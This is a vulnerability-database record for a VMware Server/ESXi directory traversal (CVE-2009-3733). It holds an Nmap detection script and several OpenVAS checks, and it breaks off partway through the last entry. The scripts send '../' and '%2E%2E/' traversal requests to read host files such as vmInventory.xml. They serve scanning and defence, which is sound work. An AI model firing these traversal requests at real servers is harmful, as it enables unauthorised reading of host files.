VMware Server <= 2.0.1,ESXi Server <= 3.5 Directory Traversal Vulnerability
2014-07-01T00:00:00
ID SSV:86539 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/36842/info
VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.
description = [[
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).
]]
---
-- @usage
-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>
--
-- @output
--| http-vmware-path-vuln:
--| VMWare path traversal (CVE-2009-3733): VULNERABLE
--| /vmware/Windows 2003/Windows 2003.vmx
--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx
--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx
--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx
--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx
--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx
--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx
-----------------------------------------------------------------------
author = "Ron Bowes"
license = "Same as Nmap--See http://www.exampel.com/book/man-legal.html"
categories = {"vuln", "safe", "default"}
require "http"
require "shortport"
portrule = shortport.port_or_service({80, 443, 8222,8333}, {"http", "https"})
local function get_file(host, port, path)
local file
-- Replace spaces in the path with %20
path = string.gsub(path, " ", "%%20")
-- Try both ../ and %2E%2E/
file = "/sdk/../../../../../../" .. path
local result = http.get( host, port, file)
if(result['status'] ~= 200 or result['content-length'] == 0) then
file = "/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/" .. path
result = http.get( host, port, file)
if(result['status'] ~= 200 or result['content-length'] == 0) then
return false, "Couldn't download file: " .. path
end
end
return true, result.body, file
end
local function fake_xml_parse(str, tag)
local result = {}
local index, tag_start, tag_end
-- Lowercase the 'body' we're searching
local lc = string.lower(str)
-- Lowrcase the tag
tag = string.lower(tag)
-- This loop does some ugly pattern-based xml parsing
index, tag_start = string.find(lc, "<" .. tag .. ">")
while index do
tag_end, index = string.find(lc, "</" .. tag .. ">", index)
table.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase
index, tag_start = string.find(lc, "<" .. tag .. ">", index)
end
return result
end
--local function parse_vmware_conf(str, field)
-- local index, value_start = string.find(str, field .. "[^\"]*")
-- if(not(index) or not(value_start)) then
-- return nil
-- end
--
-- local value_end = string.find(str, "\"", value_start + 1)
-- if(not(value_end)) then
-- return nil
-- end
--
-- return string.sub(str, value_start + 1, value_end - 1)
--end
local function go(host, port)
local result, body
local files
-- Try to download the file
result, body = get_file(host, port, "/etc/vmware/hostd/vmInventory.xml");
-- It failed -- probably not vulnerable
if(not(result)) then
return false, "Couldn't download file: " .. body
end
-- Check if the file contains the proper XML
if(string.find(string.lower(body), "configroot") == nil) then
return false, "Server didn't return XML -- likely not vulnerable."
end
files = fake_xml_parse(body, "vmxcfgpath")
if(#files == 0) then
return true, {"No VMs appear to be installed"}
end
-- Process each of the .vmx files if verbosity is on
-- if(nmap.verbosity() > 1) then
-- local result, file = get_file(host, port, files[1])
--io.write(nsedebug.tostr(file))
-- end
return true, files
end
action = function(host, port)
-- Try a standard ../ path
local status, result = go(host, port)
if(not(status)) then
return nil
end
local response = {}
table.insert(response, "VMWare path traversal (CVE-2009-3733): VULNERABLE")
if(nmap.verbosity() > 1) then
table.insert(response, result)
end
return stdnse.format_output(true, response)
end
{"type": "seebug", "viewCount": 6, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2017-11-19T13:31:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3733"]}, {"type": "dsquare", "idList": ["E-193"]}, {"type": "nessus", "idList": ["VMWARE_DIR_TRAVERSAL_VMSA_2009_0015.NASL", "VMWARE_VMSA-2009-0015.NASL", "GENTOO_GLSA-201209-25.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801144", "OPENVAS:136141256231072459", "OPENVAS:72459", "OPENVAS:104150", "OPENVAS:1361412562310104150", "OPENVAS:1361412562310100502", "OPENVAS:801144"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VMWARE-PATH-VULN.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:33310"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095"]}, {"type": "d2", "idList": ["D2SEC_VMWARE", "D2SEC_VMWARE_DIRTRAV"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_SERVER_DIR_TRAV"]}, {"type": "vmware", "idList": ["VMSA-2009-0015"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10360", "SECURITYVULNS:DOC:22713"]}, {"type": "gentoo", "idList": ["GLSA-201209-25"]}], "modified": "2017-11-19T13:31:50", "rev": 2}, "vulnersScore": 5.3}, "reporter": "Root", "title": "VMware Server <= 2.0.1,ESXi Server <= 3.5 Directory Traversal Vulnerability", "cvelist": ["CVE-2009-3733"], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86539", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-86539", "id": "SSV:86539", "status": "cve,poc", "lastseen": "2017-11-19T13:31:50", "sourceData": "\n source: http://www.securityfocus.com/bid/36842/info\r\n\r\nVMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.\r\n\r\nExploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.\r\n\r\ndescription = [[\r\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\r\n]]\r\n\r\n---\r\n-- @usage\r\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\r\n--\r\n-- @output\r\n--| http-vmware-path-vuln: \r\n--| VMWare path traversal (CVE-2009-3733): VULNERABLE\r\n--| /vmware/Windows 2003/Windows 2003.vmx\r\n--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\r\n--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\r\n--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\r\n-----------------------------------------------------------------------\r\n\r\nauthor = "Ron Bowes"\r\nlicense = "Same as Nmap--See http://www.exampel.com/book/man-legal.html"\r\ncategories = {"vuln", "safe", "default"}\r\n\r\nrequire "http"\r\nrequire "shortport"\r\n\r\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {"http", "https"})\r\n\r\nlocal function get_file(host, port, path)\r\n\tlocal file\r\n\r\n\t-- Replace spaces in the path with %20\r\n\tpath = string.gsub(path, " ", "%%20")\r\n\r\n\t-- Try both ../ and %2E%2E/\r\n\tfile = "/sdk/../../../../../../" .. path\r\n\r\n\tlocal result = http.get( host, port, file)\r\n\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\tfile = "/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/" .. path\r\n\t\tresult = http.get( host, port, file)\r\n\r\n\t\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\t\treturn false, "Couldn't download file: " .. path\r\n\t\tend\r\n\tend\r\n\r\n\treturn true, result.body, file\r\nend\r\n\r\nlocal function fake_xml_parse(str, tag)\r\n\tlocal result = {}\r\n\tlocal index, tag_start, tag_end\r\n\r\n\t-- Lowercase the 'body' we're searching\r\n\tlocal lc = string.lower(str)\r\n\t-- Lowrcase the tag\r\n\ttag = string.lower(tag)\r\n\r\n\t-- This loop does some ugly pattern-based xml parsing\r\n\tindex, tag_start = string.find(lc, "<" .. tag .. ">")\r\n\twhile index do\r\n\t\ttag_end, index = string.find(lc, "</" .. tag .. ">", index)\r\n\t\ttable.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\r\n\t\tindex, tag_start = string.find(lc, "<" .. tag .. ">", index)\r\n\tend\r\n\r\n\treturn result\r\nend\r\n\r\n--local function parse_vmware_conf(str, field)\r\n--\tlocal index, value_start = string.find(str, field .. "[^\\"]*")\r\n--\tif(not(index) or not(value_start)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\tlocal value_end = string.find(str, "\\"", value_start + 1)\r\n--\tif(not(value_end)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\treturn string.sub(str, value_start + 1, value_end - 1)\r\n--end\r\n\r\nlocal function go(host, port)\r\n\tlocal result, body\r\n\tlocal files\r\n\r\n\t-- Try to download the file\r\n\tresult, body = get_file(host, port, "/etc/vmware/hostd/vmInventory.xml");\r\n\t-- It failed -- probably not vulnerable\r\n\tif(not(result)) then\r\n\t\treturn false, "Couldn't download file: " .. body\r\n\tend\r\n\r\n\t-- Check if the file contains the proper XML\r\n\tif(string.find(string.lower(body), "configroot") == nil) then\r\n\t\treturn false, "Server didn't return XML -- likely not vulnerable."\r\n\tend\r\n\r\n\tfiles = fake_xml_parse(body, "vmxcfgpath")\r\n\r\n\tif(#files == 0) then\r\n\t\treturn true, {"No VMs appear to be installed"}\r\n\tend\r\n\r\n\t-- Process each of the .vmx files if verbosity is on\r\n--\tif(nmap.verbosity() > 1) then\r\n--\t\tlocal result, file = get_file(host, port, files[1])\r\n--io.write(nsedebug.tostr(file))\r\n--\tend\r\n\r\n\treturn true, files\r\nend\r\n\r\naction = function(host, port)\r\n\t-- Try a standard ../ path\r\n\tlocal status, result = go(host, port)\r\n\r\n\tif(not(status)) then\r\n\t\treturn nil\r\n\tend\r\n\r\n\tlocal response = {}\r\n\ttable.insert(response, "VMWare path traversal (CVE-2009-3733): VULNERABLE")\r\n\r\n\tif(nmap.verbosity() > 1) then\r\n\t\ttable.insert(response, result)\r\n\tend\r\n\r\n\treturn stdnse.format_output(true, response)\r\nend\r\n\r\n\n ", "published": "2014-07-01T00:00:00", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:40:06", "description": "Directory traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files via unspecified vectors.", "edition": 4, "cvss3": {}, "published": "2009-11-02T15:30:00", "title": "CVE-2009-3733", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3733"], "modified": "2018-10-10T19:47:00", "cpe": ["cpe:/a:vmware:server:1.0.1", "cpe:/a:vmware:esx:3.0.3", "cpe:/a:vmware:server:1.0.4_build_56528", "cpe:/a:vmware:server:1.0", "cpe:/a:vmware:server:1.0.8", "cpe:/a:vmware:esxi:3.5", "cpe:/a:vmware:esx:3.5", "cpe:/a:vmware:server:1.0.9", "cpe:/a:vmware:server:1.0.4", "cpe:/a:vmware:server:1.0.3", "cpe:/a:vmware:server:1.0.1_build_29996", "cpe:/a:vmware:server:2.0.0", "cpe:/a:vmware:server:2.0.1", "cpe:/a:vmware:server:1.0.5", "cpe:/a:vmware:server:1.0.6", "cpe:/a:vmware:server:1.0.7", "cpe:/a:vmware:server:1.0.2"], "id": "CVE-2009-3733", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3733", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:esxi:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.1_build_29996:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.4_build_56528:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "description": "The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.", "modified": "2019-04-30T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENVAS:1361412562310801144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801144", "type": "openvas", "title": "VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Server Directory Traversal Vulnerability - Nov09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801144\");\n script_version(\"2019-04-30T06:12:35+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-30 06:12:35 +0000 (Tue, 30 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-11-05 12:25:48 +0100 (Thu, 05 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-3733\");\n script_bugtraq_id(36842);\n script_name(\"VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37186\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3062\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Oct/1023088.html\");\n script_xref(name:\"URL\", value:\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2009-0015.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\", \"VMware/Server/Linux/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote/local attacker to disclose\n sensitive information.\");\n\n script_tag(name:\"affected\", value:\"VMware Server version 2.0.x prior to 2.0.2 Build 203138,\n VMware Server version 1.0.x prior to 1.0.10 Build 203137 on Linux.\");\n\n script_tag(name:\"insight\", value:\"An error exists while handling certain requests can be exploited to download\n arbitrary files from the host system via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade the VMWare product(s) according to the referenced vendor announcement.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/Linux/Installed\")){\n exit(0);\n}\n\nvmserverVer = get_kb_item(\"VMware/Server/Linux/Ver\");\nif(vmserverVer)\n{\n if(version_in_range(version:vmserverVer, test_version:\"1.0\",\n test_version2:\"1.0.9\")||\n version_in_range(version:vmserverVer, test_version:\"2.0\",\n test_version2:\"2.0.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:33:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "description": "The host is installed with VMWare product(s)and is prone to multiple\n vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2010-02-23T00:00:00", "id": "OPENVAS:1361412562310100502", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100502", "type": "openvas", "title": "VMware Products Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Products Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100502\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-02-23 17:05:07 +0100 (Tue, 23 Feb 2010)\");\n script_bugtraq_id(36842);\n script_cve_id(\"CVE-2009-3733\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"VMware Products Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Remote file access\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\", \"gb_vmware_esx_snmp_detect.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8222);\n script_mandatory_keys(\"VMware/ESX/installed\", \"Host/runs_unixoide\"); # only vmware running under linux is affected\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37186\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3062\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Oct/1023088.html\");\n script_xref(name:\"URL\", value:\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2009-0015.html\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote/local attacker to disclose\n sensitive information.\");\n\n script_tag(name:\"affected\", value:\"VMware Server version 2.0.x prior to 2.0.2 Build 203138,\n VMware Server version 1.0.x prior to 1.0.10 Build 203137 on Linux.\");\n\n script_tag(name:\"insight\", value:\"An error exists while handling certain requests can be exploited to download\n arbitrary files from the host system via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade the VMWare product(s) according to the referenced vendor announcement.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMWare product(s)and is prone to multiple\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default:8222);\nres = http_get_cache(item:\"/\", port:port);\n\n# URL based on whether the target is esx/esxi or server\nif(\"VMware ESX\" >< res) {\n path = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\";\n} else if(\"<title>VMware Server\" >< res) {\n path = \"/sdk/../../../../../../\";\n} else {\n exit(0); # not vmware\n}\n\nhost = http_host_name(port:port);\n\nreq = http_get(item:\"/ui/\", port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif(!buf)\n exit(0);\n\nif(\"Location: https://\" >< buf) # port is redirected, will be checked if the https port is touched...\n exit(0);\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = path + file;\n req = string(\"GET \", url, \" HTTP/1.1\\r\\n\");\n req += string(\"TE: deflate,gzip;q=0.3\\r\\nConnection: TE, close\\r\\n\");\n req += string(\"Host: \", host, \"\\r\\n\\r\\n\");\n\n buf = http_send_recv(port:port, data:req);\n if(!buf)\n continue;\n\n if(egrep(pattern:pattern, string:buf)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-19T10:55:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "description": "The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENVAS:801144", "href": "http://plugins.openvas.org/nasl.php?oid=801144", "type": "openvas", "title": "VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_serv_dir_trav_vuln_nov09_lin.nasl 6518 2017-07-04 13:49:06Z cfischer $\n#\n# VMware Server Directory Traversal Vulnerability - Nov09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the remote/local attacker to disclose\n sensitive information.\n Impact Level: System\";\ntag_affected = \"VMware Server version 2.0.x prior to 2.0.2 Build 203138,\n VMware Server version 1.0.x prior to 1.0.10 Build 203137 on Linux.\";\ntag_insight = \"An error exists while handling certain requests can be exploited to download\n arbitrary files from the host system via directory traversal attacks.\";\ntag_solution = \"Upgrade your VMWares according to the below link,\n http://www.vmware.com/security/advisories/VMSA-2009-0015.html\";\ntag_summary = \"The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.\";\n\nif(description)\n{\n script_id(801144);\n script_version(\"$Revision: 6518 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 15:49:06 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-05 12:25:48 +0100 (Thu, 05 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-3733\");\n script_bugtraq_id(36842);\n script_name(\"VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37186\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3062\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2009/Oct/1023088.html\");\n script_xref(name : \"URL\" , value : \"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\", \"VMware/Server/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/Linux/Installed\")){\n exit(0);\n}\n\n# Check for VMware Server\nvmserverVer = get_kb_item(\"VMware/Server/Linux/Ver\");\nif(vmserverVer)\n{\n # Check for version 1.0 < 1.0.10 (1.0.10 Build 203137) or 2.0 < 2.0.2 (2.0.2 Build 203138)\n if(version_in_range(version:vmserverVer, test_version:\"1.0\",\n test_version2:\"1.0.9\")||\n version_in_range(version:vmserverVer, test_version:\"2.0\",\n test_version2:\"2.0.1\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.", "modified": "2017-03-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104150", "href": "http://plugins.openvas.org/nasl.php?oid=104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_http_vmware_path_vuln_net.nasl 5505 2017-03-07 10:00:18Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts 